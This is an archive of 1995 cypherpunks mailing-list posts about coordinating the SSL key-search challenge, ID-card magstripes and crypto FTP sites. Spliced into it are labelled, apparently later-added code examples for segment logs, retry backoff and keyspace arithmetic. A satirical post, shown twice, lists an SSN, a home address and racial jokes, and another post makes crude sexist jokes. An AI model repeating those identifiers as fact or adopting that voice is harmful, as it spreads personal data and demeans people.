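# Constructed log: hostB never ACKs 0x1a01 (hostC ACKs it instead),
# hostA is still holding 0x1a02, and 0x1a03 was never handed out.
sample_log() {
    cat <<'EOF'
GOT 0x1a00
GOT 0x1a01
GOT 0x1a02
GOT 0x1a03
ALLOC hostA 0x1a00
ALLOC hostB 0x1a01
ACK hostA 0x1a00
ALLOC hostA 0x1a02
ACK hostC 0x1a01
EOF
}
```

Run as `sample_log | segment_report`; an ACK from a host that was not given the segment is reported rather than counted, so it cannot mark keyspace as searched.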




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 13:28:20 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: SSL trouble
In-Reply-To: <9508281854.AA20060@cantina.verity.com>
Message-ID: <"swan.cl.cam.:264930:950828202725"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> Note that it is a list, and it tries them in order (all A RRs).
> Wouldn't this result in the slaves higher in the list being hammered?

There is not "a" list ...
The list returned will be "tailored" for the calling host.
Thus an EU host will have EU sites near the front, AU hosts will have AU
servers, etc ...
(Well, maybe they'll just be returned in a random order !).

By having multiple A RRs for a name, the DNS will do the pseudo load balancing.

> Perhaps you want to do something similar to what the later releases of 
> bind do with machines with multiple names, and round robin the list.

Indeed -- as above:
1) optimise the list so that "near" servers are used.
2) cycle the servers
3) leave it to the DNS to SHUFFLE.

> If you had a list with hosts A, B, and C, the first request would get
> ABC, the next BCA, the next CAB, and the next back to ABC.  That would
> distribute the work between the slaves a bit better.

Yup -- but if it's just "random", I'd probably use a single name ...

> Actually this is what I meant, that they would ask for it.  My idea would
> be that when a slave is asked for keyspace, if they don't have enough
> they'd ask for the next large chunk.  That way the central server doesn't
> ever have to deal with small requests.

Well, the current implementation will give what it has left, then on restarting
the main loop it notices that it has no keys left, so asks the main server for
more, so if the clients aren't all bunched up, it'll pre-fetch more segments,
so there's a fair chance the client won't have to wait :-))

>> Nah - results still go direct pro tem.
> You might consider it:)

I can always add some more A RRs to sksp-ack to load balance ...

>> These cache servers are asking for non trivial amounts of keyspace.
>> As such there should not be *too* many, and then need to be "managed" ...
>> If one crashes, the logs need to be scanned to see how to restart it (so that
>> it starts by doling out the segments that it had not sub-doled to its clients)
> Quite right.  I'd assume that the first level list of slaves would be
> controlled by you.

Possible ....

I've had various offers to host a server ...

> If you're careful enough a slave should be able to go down and come
> back up without losing any state at all.

At a cost ....

Either it has to save state in a form that's easy to reload later,
or save state in a way that it can spend some time before it starts to
	work out what it has to do [[Hmm -- I might write a script to do that]]

> All brutes/slaves talking to it should be able to continue on with no loss
> of information.

Loss of what info ?

Running brutessl's will call brclient to report the ACK.
They will report back the data as normal -- nothing to do with the Allocate
Slave -- even if it were, it would auto fallback to another server.

brloop's will ask for another keyspace, and on finding that the first server
on its list doesn't respond, it'll try the next server on its list, and if
none respond, it'll wait a bit and start asking again ...

> I would put an exponential backoff on the time between retries for the
> brutes talking to the slaves as well as the slaves talking to the master.

Well, I use a multiplicative backoff within limits ....

> (With a limit for the amount of backoff of course.)

Indeed -- how long ?

> If you can't talk to someone you might sleep for 8 seconds and retry,
> if you still couldn't back off to 16, then 32, then 64, then 128, etc...

Well, 60, 120, 180, 240, 300, 300, 300, ...

> the maximum might be somewhere around ten or fifteen minutes, so that within
> ten or fifteen minutes of crashing and being restarted everything would be
> humming along with no manual intervention required on any of the lower levels.

Well, 5 mins ... < 1/3 of a segment ...

>> However, note that with big cache servers (as opposed to Local CPU Farm
>> servers where all clients are the same "ID") reports of sub-allocation have
>> to be passed back to the root :-(
> That's a good point.  If you want to keep track of who has what, it all has
> to get back to the root eventually.

Yes -- I do -- so that it's possible to tie up requests and ACKs.

> If you use my idea of having the slaves cache the information until the next
> time they'd be contacting the root anyway, (or whenever the timer elapses,)
> then you greatly cut down on the number of small packets seen by the root,
> (and each level of slaves when there's a hierarchy).

Yup -- that's what an ACK reflector will do.

Note that Allocation and ACKs are separate ....

> <snicker;>  Sound like we could have a religious war if we wanted,

I was agreeing with you ! You said:

>>> Of course I do everything like this in C++, but I suppose perl would be the
>>> most portable.  It's a shame it's so aesthetically displeasing to the eye.

or is the "it" in "shame it's so" not the preceding direct noun, i.e. C++? :-)))
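
Added example (not part of the message above, and not brloop code): the client behaviour described in this exchange, trying each server on the list in order and backing off only when none responds, with the 60, 120, ... 300 second schedule next to the doubling schedule from the quoted suggestion. The function names, the try_server and pause hooks and the simulated outage are hypothetical; the 15-minute cap is taken from the quoted "ten or fifteen minutes".

```shell
#!/bin/sh
# Added example, not from the thread.

# Schedule from the reply above: 60, 120, 180, 240, 300, 300, ...
stepped_backoff() {                  # $1 = failed round, starting at 1
    d=$(( $1 * 60 ))
    if [ "$d" -gt 300 ]; then d=300; fi
    echo "$d"
}

# Schedule from the quoted suggestion: 8, 16, 32, ... up to a cap.
exp_backoff() {                      # $1 = failed round, $2 = cap in seconds
    d=8; i=1
    while [ "$i" -lt "$1" ] && [ "$d" -lt "$2" ]; do
        d=$(( d * 2 )); i=$(( i + 1 ))
    done
    if [ "$d" -gt "$2" ]; then d=$2; fi
    echo "$d"
}
exp_backoff_15m() { exp_backoff "$1" 900; }

# fetch_segment "srv1 srv2 ..." MAX_ROUNDS BACKOFF_FUNCTION
# Tries every server in list order; only when the whole list has failed
# does it wait and start again.  Prints "<server> <round> <seconds waited>".
fetch_segment() {
    servers=$1; max_rounds=$2; backoff=$3
    round=1; waited=0
    while [ "$round" -le "$max_rounds" ]; do
        for srv in $servers; do
            if try_server "$srv" "$round"; then
                echo "$srv $round $waited"
                return 0
            fi
        done
        delay=$("$backoff" "$round")
        pause "$delay"
        waited=$(( waited + delay ))
        round=$(( round + 1 ))
    done
    return 1                         # gave up: no server answered
}

# Hooks.  Constructed simulation: server "a" never answers and server "b"
# starts answering in round 4.  A real client would make the allocation
# request in try_server and call `sleep "$1"` in pause.
try_server() { [ "$1" = "b" ] && [ "$2" -ge 4 ]; }
pause() { :; }
```

With this simulated outage the stepped schedule has waited 360 seconds before the successful round and the doubling schedule 56, at the price of more requests hitting the servers early on.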




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:41:32 PDT
To: cypherpunks@toad.com
Subject: "Citizen-Unit Identification" a Red Herring
Message-ID: <ac67e35c0e021004b325@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



All this paranoid talk about the dangers of thumbprints on ID cards, about
driver's licenses, and about magstripes got me to thinking.

So, I accessed my NLETS (National Law Enforcement Telecommunications
System) and downloaded my own record:

Citizen-Unit ASCII Name: "Timothy Christopher May"
NLETS Actual Name: G0Yj34C1qm92H7u
Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo"
Residence: 427 Allan Lane, Corralitos, CA 95075
Driver's License: N4197484
SSN: 227-80-5823
Passport Number: H673qop90
Race: Aryan
Origin: Europe
Hair: Brown
Eyes: Blue
Weight: 210 pounds (10/94, recorded at SFO)
Known associations: Anarchist Alliance, Young Students for Discordianism,
Vernor Vinge Fan Club, Information Liberation Front
Magazines Subscribed To: Newsweek, Playboy, The Economist, MacWeek, Anarchy
Today, Liberty, FertilizerWorld, Reason, MacUser, NewtonGazette, Bay Aryan
Events, Information Week
Consumer Preferences: beer (+++), wine (+), cigarettes (-)
Electricity Patterns: consistent with either marijuana cultivation or heavy
Net usage, or both
Threat level: Class 3 Security Threat

I don't see what the big deal is. The NLETS record implies I'm some kind of
security threat, but also correctly notes that I'm an Aryan, so I guess I'm
safe.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:42:01 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <ac67e8b60f021004f508@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:48 PM 8/28/95, Jason L Tibbitts III wrote:
>>>>>> "TCM" == Timothy C May <tcmay@got.net> writes:
>
>TCM> At 8:52 PM 8/20/95, Hadmut Danisch wrote:
>>> These transponders are already used for many years. They inject them in
>>> pigs and cows to identify them. And some car manufacturers put them into
>>> the ignition keys as theft protections.
>
>TCM> There has so far been no known uses of this on humans, at least as a
>TCM> matter of routine. Possibly some developers have tried injecting
>TCM> themselves, for the usual reasons.
>
>Believe it or not, something like this is being used (or is being prepared
>for use) in breast implants.  An article in the Houston (silicone city)
>Chronicle about a month ago (sorry, I can't produce a more exact reference)
>stated that new soybean oil breast implants are being manufactured to
>accept an identification device to track information on the patient and the
>implanting doctor.
>
>It's not exactly big brother (bigger sister?) but it's the first
>human-implanted ID device that I've heard of.  I don't know if any have
>actually been implanted.

Big Brother? Big Sister? Naw, it's "Big Tits."

It's a way for we males to scan the females at the bar to see if they're
naturally well-endowed or silicone-enhanced. Part of the "truth in
advertising" laws recently passed.

...

Seriously, I'm awfully skeptical that any kind of remote sensing device is
to be placed in the breasts of women seeking enhancement. The technology
just does not currently support small devices, though I suppose some of the
55GG strippers could support an active transmitter (or, "transtitter").

Conceivably, when the women go down to their local doctors to have their
tits inflated there can be some kind of "taggants" added, a la the taggants
added to some explosives, but this is a far cry from an electronic
identification device.

Some boob must've come up with this one.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
Date: Tue, 29 Aug 95 11:45:02 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <ac5d434c030210047d03@[205.199.118.202]>
Message-ID: <9508290348.AA14292@hpc.uh.edu>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "TCM" == Timothy C May <tcmay@got.net> writes:

TCM> At 8:52 PM 8/20/95, Hadmut Danisch wrote:
>> These transponders are already used for many years. They inject them in
>> pigs and cows to identify them. And some car manufacturers put them into
>> the ignition keys as theft protections.

TCM> There has so far been no known uses of this on humans, at least as a
TCM> matter of routine. Possibly some developers have tried injecting
TCM> themselves, for the usual reasons.

Believe it or not, something like this is being used (or is being prepared
for use) in breast implants.  An article in the Houston (silicone city)
Chronicle about a month ago (sorry, I can't produce a more exact reference)
stated that new soybean oil breast implants are being manufactured to
accept an identification device to track information on the patient and the
implanting doctor.

It's not exactly big brother (bigger sister?) but it's the first
human-implanted ID device that I've heard of.  I don't know if any have
actually been implanted.
---
  Jason L. Tibbitts III - tibbs@uh.edu - 713/743-8687 - 221SR1
System Manager:  Texas Center for Advanced Molecular Computation 
            1994 PC800 "Kuroneko"      DoD# 1723




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 29 Aug 95 11:38:05 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508290556.WAA12070@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>What is the capacity of the mag strips. Do they carry much more than some
>ID code for computer reference? It seems unlikely that there is enough
>storage
>for a thumbprint. Some vitals perhaps, but again it would most likely simply
>be a speedier way of referencing the card holder's supposed True Name. (After
>all they'd have to be checking driving record information as well.) Still
>decrypting the cards would be amusing, just to aggravate those who become too
>used to the convenience. 'Oh.. sorry Governor Wilson... my but you look
>different up close'.

They would not have to include an entire thumbprint.  The actual code used
to verify fingerprints is not very large.  All that would be needed is
enough information to ID into the "official" records and enough checksum
type information to prevent alteration/counterfeiting.  Using magnetic media
for this is a bit foolish as it can be changed/destroyed with the stroke of
a magnet.  I will not say by what means I would think should suit as a
better encoding scheme because: 1) They are not using it and 2) I do not
want to give them any ideas.

|            Visualize whirled keys!              | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 11:38:43 PDT
To: cypherpunks@toad.com
Subject: Claiming chunks of keyspace...
Message-ID: <ac67f81d130210049392@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Looking at it from the outside, I thought the latest SSL challenge
experiences were highly instructive. Nothing to be ashamed of.

An interesting question: Is it a valid approach for J. Random User to
"claim" some chunk of keyspace to search?

If the "reward" of finding the gold buried in the keyspace (a key that
meets the  challenge) is high and the cost of claiming the keyspace is low
(or nil), then game theory tells us that some folks will be tempted to
claim a bigger chunk of keyspace than they can possibly process.

What can be done to reduce this effect?

On the negative side, ostracize or punish those who bite off more than they
can chew. This approach is fraught with dangers.

On the positive side, let everyone simply attack the keyspace as they see
fit, picking random parts to attack. This should not be "worse" than a
factor of several from a "perfectly coordinated" attack. (I haven't spent
time calculating this, but my intuition is that a random attack, with
overlapping keyspace, is not a lot less efficiently attacked than
attempting to arrange for no overlaps...just based on my mental picture of
dropping line segments randomly on some interval and figuring coverage of
the line segment.)

In between, market systems where intermediate agents subcontract out chunks
of keyspace. Mechanisms for this are lacking.

-Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Mon, 28 Aug 95 20:44:28 PDT
To: sjb@austin.ibm.com
Subject: Re: SSL trouble
Message-ID: <199508290338.XAA24000@interport.net>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> Then what do you care about the group's procedures?  It
> doesn't "prevent you from participating" --- you *aren't*
> participating. You're attempting to solve the problem on your
> own.

  This distinction is valid in the current series of academic
exercises.  However, if we were actually trying to break
something important, anything that might accelerate the crack
would be a form of participation.  And as Nathan Loofbourrow has
pointed out, the random method is much more secure against
real-world retaliation.  It's also the only method that will
work for me; I use a shell account, and I never know in advance
when I will get time on the computers at work (which aren't on
the net at all).

  I _don't_ care about the procedures, as long as I can get the
information I need to go my own way.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 29 Aug 95 11:43:22 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Florida Drivers Permits
In-Reply-To: <199508290035.RAA08342@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950829001403.7528A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> At 09:55 AM 8/29/95 +1000, Mark wrote:
> >>>Better would be to figure out the encoding scheme and post it here.
> >>I like this, myself.  It'd be nice to be able to have the picture of my
> >>choosing instead of a digitized thumbprint...
> >
> >I think the officer arresting you would frown if your license dumped a nudie
> >picture of Cindy Crawford instead of your identification details.

Or of Mel Gibson.


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Tue, 29 Aug 95 11:42:31 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <199508290435.AAA11757@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




-----BEGIN PGP SIGNED MESSAGE-----

"Daniel R. Oelke" <droelke@rdxsunhost.aud.alcatel.com> writes:
>someone, probably either patrick@Verity.COM or hallam@w3.org, writes:
>>Piete.Brooks@cl.cam.ac.uk, stripes@va.pubnix.com writes:
>>
>>> I'd like to get the raw date in brloop (a sh script). In perl I'd just
>>> use "time", and I can't see a way to get "date +" to yield the raw time.
>>> I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
>>> may not be on the user's PATH. Any suggestions ?
>>
>>"date '+%s'" does it under BSDI, but I'm not sure how portable it is.
>>
>
>That doesn't work under SunOS 4.1.x, but this does:
>
>   date "+%S %M 60 * + %H 3600 * + %j 86400 * + %y 31536000 * + p" | dc
>
>This assumes 365 days/year, so if you jump from a leap year to a non-leap
>year it won't work right.  Hey - a 1/1460 failure rate is better
>than most Windoze programs I've used ;-)
>
>It also isn't the "absolute" time, (as given by time()), but
>gives a number of seconds that constantly increases.
>
>With a little more work you should be able to adjust this to be close
>to time() functionality.

This was, of course, originally one long line:

date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y 
69 - 4 / 86400 * + 3600 4 * + p" |dc

Differences: %j 1 -, because days of the year are numbered from 1, not
zero, and we don't want to count 86400 seconds for today before today
has finished.

%y 70 -, because 1970 is the epoch, of course.

%y 69 - 4 / 86400 * +, takes into account all leap days in all leap years
up through last year.  Why?  Left as an exercise for the reader.  ;-)

3600 4 * +, this is a bit of ugliness.  date +%s returns GMT for me.
I'm in EDT, so that's four hours away from GMT.  So this is necessary to
make this return the same number as date +%s.  But if you're in another
time zone, you need to change that 4 above appropriately.  If this whole
section is deleted we are left with:

date +"%S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * + %y
69 - 4 / 86400 * + p" |dc

which returns local time, which is probably what you wanted anyway.

By the way, date --version, on my system, returns "GNU shellutils 1.9.4",
just in case you were wondering what date I'm using.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEKT+REcrOJethBVAQEXgAQAx9HLiR+LPvclEYRFrliqOugj9cbzGwLD
HCWOC8/MfrXuS3MPLQj1HugA18LH/LGy3BTp7cSnSNXDoL2/7UkLeAspGejRrEG4
WgQ8HIC2weVDP66PqioFD6lAELatRWk4Xl/mLgVrxluBrKtRnADtCX/VdHPw1ZiU
YDfiWBtKRGU=
=i1Di
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.
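The dc formula in David R. Conrad's message, carried through as an added check; this is not code from the post. It evaluates the same expression on broken-down time fields and compares it with `calendar.timegm`, which answers the "exercise for the reader" about the `%y 69 - 4 /` term and shows how far the formula stays valid. The sample instants, the function names and the "years since 1900" variant are assumptions made for this illustration.

```python
import calendar
from datetime import datetime

# Constructed sample instants checked in every year: start of year, a moment
# after the leap-day position, and the last second of the year.
SAMPLES = [(1, 1, 0, 0, 0), (3, 1, 12, 34, 56), (12, 31, 23, 59, 59)]


def conrad_seconds(tm, two_digit_year=True):
    """Evaluate the post's dc expression on broken-down time fields.

    %S %M 60 * + %H 3600 * + %j 1 - 86400 * + %y 70 - 31536000 * +
    %y 69 - 4 / 86400 * +
    """
    # date's %y is the year modulo 100; the alternative is years since 1900.
    y = tm.tm_year % 100 if two_digit_year else tm.tm_year - 1900
    # Leap years before this one are 1972, 1976, ...: there are (y - 69) / 4
    # of them, rounded down. dc truncates toward zero at its default scale.
    leap_days = int((y - 69) / 4)
    return (tm.tm_sec + tm.tm_min * 60 + tm.tm_hour * 3600
            + (tm.tm_yday - 1) * 86400   # whole days already finished this year
            + (y - 70) * 31536000        # whole 365-day years since 1970
            + leap_days * 86400)         # Feb 29ths in the years before this one


def first_mismatch(two_digit_year, start=1970, stop=2110):
    """First year in [start, stop) where the formula disagrees with timegm."""
    for year in range(start, stop):
        for month, day, hour, minute, second in SAMPLES:
            tm = datetime(year, month, day, hour, minute, second).timetuple()
            if conrad_seconds(tm, two_digit_year) != calendar.timegm(tm):
                return year
    return None


def utc_from_local(tm_local, hours_west_of_gmt):
    """The post's '3600 4 * +' term: add the zone offset to local-field seconds."""
    return conrad_seconds(tm_local) + 3600 * hours_west_of_gmt


if __name__ == "__main__":
    print("two-digit %y first fails in:", first_mismatch(True))
    print("years-since-1900 first fails in:", first_mismatch(False))
```

With a two-digit `%y` the expression is exact until the year field wraps; fed years since 1900 instead, it stays exact until the first century year that is not a leap year has passed.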




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 00:33:25 PDT
To: cypherpunks@toad.com
Subject: Sendmail Bugs
Message-ID: <199508290733.BAA01311@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This has nothing to do with crypto, and is only remotely related to 
remailers. However, I thought I'd send it along to demonstrate to our 
conspiracypunks friends how to shorten the length of an off-topic post.

There is a document on alt.security which describes exploitable sendmail
bugs. The reference is <809544856snz@hacknet.demon.co.uk>
I saved a copy in case anyone would like one.

SEE! Now wasn't that easy!

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMELCW8La+QKZS485AQGWMQL8DycUwDwZ9ACaLo27o6fUrqoz3KAXJB4C
fz6FHp6LLBbTDpPQoSgYfhcYtpySs7IuXvr5ja+/qNFi6Jq6M98WBvFMuLug8HsR
8IFvu+KVF1VSJ8EOAcdQ9MEAs3m+Zbk0
=YZjS
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Mon, 28 Aug 95 17:50:19 PDT
To: cypherpunks@toad.com
Subject: Re: Bet e$ on how long it will take for PGPFone to make it overseas!
Message-ID: <199508290050.AA11863@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Censored Girls Anonymous sez:

: I thought I saw a version over at ftp.hacktic.nl already. 
: I tawt I taw a puddy tat. I did, I did taw a puddy tat!
: And it's been in the incoming directory for all weekend too!

It's now relocated to ftp.hacktic.nl:/pub/pgp/pgpfone

Also aussie SSL and SSLapps have been made available at
 /pub/crypto/SSL
 /pub/crypto/SSLapps

A dir has been added for Crypto Libraries (Wei Dai, RSAREF and DES)
 /pub/crypto/LIBS

Also a dir has been added for Crypto apps (CFS, SSH CTCP etc)
 /pub/crypto/CRYPTOapps

Enjoy !
--
Alex de Joode		Replay Communication and Internet Services
usura@replay.com	Inet Consulting, Web Authoring, Trademark
http://www.replay.com	and Copyright Consultancy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:25:17 PDT
To: cypherpunks@toad.com
Subject: "CITIZEN-UNIT IDENTIFICATION" A RED HERRING
Message-ID: <9509201546155269@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 28 Aug 1995 21:44:12 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: "Citizen-Unit Identification" a Red Herring


All this paranoid talk about the dangers of thumbprints on ID cards, about
driver's licenses, and about magstripes got me to thinking.

So, I accessed my NLETS (National Law Enforcement Telecommunications
System) and downloaded my own record:

Citizen-Unit ASCII Name: "Timothy Christopher May"
NLETS Actual Name: G0Yj34C1qm92H7u
Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo"
Residence: 427 Allan Lane, Corralitos, CA 95075
Driver's License: N4197484
SSN: 227-80-5823
Passport Number: H673qop90
Race: Aryan
Origin: Europe
Hair: Brown
Eyes: Blue
Weight: 210 pounds (10/94, recorded at SFO)
Known associations: Anarchist Alliance, Young Students for Discordianism,
Vernor Vinge Fan Club, Information Liberation Front
Magazines Subscribed To: Newsweek, Playboy, The Economist, MacWeek, Anarchy
Today, Liberty, FertilizerWorld, Reason, MacUser, NewtonGazette, Bay Aryan
Events, Information Week
Consumer Preferences: beer (+++), wine (+), cigarettes (-)
Electricity Patterns: consistent with either marijuana cultivation or heavy
Net usage, or both
Threat level: Class 3 Security Threat

I don't see what the big deal is. The NLETS record implies I'm some kind of
security threat, but also correctly notes that I'm an Aryan, so I guess I'm
safe.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 16:25:01 PDT
To: cypherpunks@toad.com
Subject: CLAIMING CHUNKS OF KEYSPACE...
Message-ID: <9509201546165270@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 28 Aug 1995 23:02:01 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Claiming chunks of keyspace...


Looking at it from the outside, I thought the latest SSL challenge
experiences were highly instructive. Nothing to be ashamed of.

An interesting question: Is it a valid approach for J. Random User to
"claim" some chunk of keyspace to search?

If the "reward" of finding the gold buried in the keyspace (a key that
meets the  challenge) is high and the cost of claiming the keyspace is low
(or nil), then game theory tells us that some folks will be tempted to
claim a bigger chunk of keyspace than they can possibly process.

What can be done to reduce this effect?

On the negative side, ostracize or punish those who bite off more than they
can chew. This approach is fraught with dangers.

On the positive side, let everyone simply attack the keyspace as they see
fit, picking random parts to attack. This should not be "worse" than a
factor of several from a "perfectly coordinated" attack. (I haven't spent
time calculating this, but my intuition is that a random attack, with
overlapping keyspace, is not a lot less efficiently attacked than
attempting to arrange for no overlaps...just based on my mental picture of
dropping line segments randomly on some interval and figuring coverage of
the line segment.)

In between, market systems where intermediate agents subcontract out chunks
of keyspace. Mechanisms for this are lacking.

-Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
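The overlap cost that Tim May's "Claiming chunks of keyspace..." estimates by intuition, and that bears on the random method Will French describes in the "SSL trouble" thread, can be worked out directly. This is an added example, not code from either post: the equal-sized-chunk model, the equal-speed workers, the chunk counts and every function name are assumptions made for illustration.

```python
import math
import random


def coverage_random(n_chunks, picks):
    """Expected fraction of keyspace covered after `picks` uniform random chunk choices."""
    return 1.0 - (1.0 - 1.0 / n_chunks) ** picks


def expected_work_coordinated(n_chunks):
    """Chunks searched until the key is found when no chunk is searched twice."""
    return (n_chunks + 1) / 2.0


def expected_work_random(n_chunks):
    """Chunks searched when every pick is uniform with replacement (geometric, p = 1/n)."""
    return float(n_chunks)


def expected_work_independent_sweeps(n_chunks, workers):
    """Total chunks searched when each worker sweeps its own random order.

    Workers never repeat their own chunks but know nothing of each other.
    The search stops when the first worker reaches the key's chunk, so the
    number of rounds is the minimum of `workers` uniform positions in 1..n.
    Assumes equal-speed workers, one chunk per worker per round.
    """
    rounds = sum((i / n_chunks) ** workers for i in range(1, n_chunks + 1))
    return workers * rounds


def picks_for_success(n_chunks, p):
    """Random picks needed before the key's chunk has been hit with probability >= p."""
    return math.ceil(math.log(1.0 - p) / math.log(1.0 - 1.0 / n_chunks))


def simulate(n_chunks, trials, seed=1995):
    """Monte Carlo check: mean work for a coordinated sweep and for random picks."""
    rng = random.Random(seed)
    coordinated = 0
    uncoordinated = 0
    for _ in range(trials):
        key_chunk = rng.randrange(n_chunks)
        coordinated += key_chunk + 1          # sweep chunks 0, 1, 2, ... in order
        work = 1
        while rng.randrange(n_chunks) != key_chunk:
            work += 1                         # overlapping picks are wasted work
        uncoordinated += work
    return coordinated / trials, uncoordinated / trials


if __name__ == "__main__":
    n = 1000
    print("coverage after n random picks:", round(coverage_random(n, n), 3))
    print("random / coordinated work:",
          expected_work_random(n) / expected_work_coordinated(n))
    print("9 independent sweeps / coordinated:",
          expected_work_independent_sweeps(n, 9) / expected_work_coordinated(n))
    print("picks for 95% success:", picks_for_success(n, 0.95),
          "vs coordinated:", int(0.95 * n))
    print("simulated means:", simulate(200, 3000))
```

In this model the expected penalty for uncoordinated searching approaches a factor of two, while reaching a high success probability costs about three times the coordinated work at 95%.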






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 29 Aug 95 04:41:53 PDT
To: ecm@ai.mit.edu
Subject: e$: A CALL FOR FOUNDERS: The Boston Society for Digital Commerce
Message-ID: <v02120d02ac61470af9db@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


                     A CALL FOR FOUNDERS
